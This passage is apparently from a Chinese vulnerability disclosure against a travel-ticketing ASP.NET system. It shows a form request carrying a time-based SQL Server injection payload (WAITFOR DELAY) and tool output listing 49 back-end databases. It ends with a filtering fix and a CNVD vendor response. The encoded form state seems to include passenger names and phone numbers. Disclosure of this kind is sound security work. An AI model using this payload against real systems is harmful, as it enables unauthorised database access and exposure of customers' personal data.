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&__EVENTVALIDATION=/wEWPgL4oLG6DQKP2NOjDAKQ2NOjDAKft/lNAuikz5UDApi4iOoEAoznisYGArursYYIApzEg7wPAoXZ9dsDApGU9SQCrcaEtQIClYq34AMCuo/QxA4CgYvYlw4ClI2NyAECj6H92wkC5tOOxAgChOWGmAQCh+WGmAQCluWGmAQCmeWGmAQCgeXGmwQCgeXKmwQCgeXOmwQCgeXymwQCgeX2mwQCgeX6mwQCgeX+mwQCgeXimwQCgeWmmAQCgeWqmAQCgOXGmwQCgOXKmwQCgOXOmwQCgOXymwQCgOX2mwQCpuTkuwcC4s3XnAMCy626qA0C0fjq7AkCg/XxpggCmYrurQkC6YuC1AsC06HBqQcCutuV1AQC8+sEAsuR9c8MAvjTm+QLAo3S39oNAsih8ecFAqDCk/ENAtLNlZ0JAuekk8gEAuiX56oEAsiDhOgJAoLey+EPAvHrsI8HAuzVi9wEAobfk9cFAsCV1cAIAtaUz5sC9U5aJB3VbcQ1pX+Dk5s/xscEkJ4WmW6r9DIW5K08LSo=&ckfs_sel=0&cjrkey=aaa%' WAITFOR DELAY '0:0:5'--&company=%E8%BE%93%E5%85%A5%E5%AE%A2%E6%88%B7%E5%8D%A1%E5%8F%B7%E6%88%96%E6%8B%BC%E9%9F%B3%E6%9F%A5%E8%AF%A2&Button1=%E6%9F%A5%E8%AF%A2%E6%97%85%E5%AE%A2&lx_key=&lxid=0&a_company=&a_telphone=&a_mobile=&a_email=&a_website=&a_content=&pdate=2015-06-15&ptime=12&txuser=&subject=&info=&sms_mb=&sms_birthdaymb=&memberid=0&cjrid=0&cjrinfo=&hotline=021-21458747&office=wux119&kefu=admin&rtpnr=&meflag=admin&birthday_num=1s
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005
available databases [49]:
[*] amyt_pek
[*] bfz_bjs
[*] chaoyang_wux
[*] cht_taicang
[*] distribution
[*] dzy_bjs
[*] guojing_pek
[*] hak_shu
[*] hqrx_pek
[*] hxd_pek
[*] hy_canhzr
[*] jmy_hlj
[*] kmg_naixy
[*] kpjc_pek
[*] master
[*] model
[*] msdb
[*] oa_users
[*] pek_bssdn
[*] pek_bswangbanan
[*] pek_zsy
[*] PiaoYou_bjcyj
[*] PiaoYou_dxtravel
[*] PiaoYou_hczls
[*] PiaoYou_jifei
[*] PiaoYou_jingyuan
[*] PiaoYou_jyh
[*] PiaoYou_jyzhaoyang
[*] PiaoYou_ngbaifei
[*] PiaoYou_pekjinlin
[*] PiaoYou_shah
[*] PiaoYou_shajcm
[*] PiaoYou_shaxu
[*] PiaoYou_shazb
[*] PiaoYou_shtianai
[*] PiaoYou_szhuanyu
[*] PiaoYou_xw2012
[*] rzh_bjs
[*] sdpiaoyou
[*] shehua_henan
[*] shx_web
[*] shzx_sha
[*] tdsf_pek
[*] tempdb
[*] wanhely
[*] wdm_sdyt
[*] xiy_kh
[*] yitu_pek
[*] yuenan
修复方案:
过滤
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:12
确认时间:2015-06-22 09:21
厂商回复:
cnvd确认并复现所述情况,已由cnvd通过以往获知的公开联系渠道向软件生产厂商通报,对于涉及的案例,暂未建立联系渠道,由软件生产厂商联系处置。
最新状态:
暂无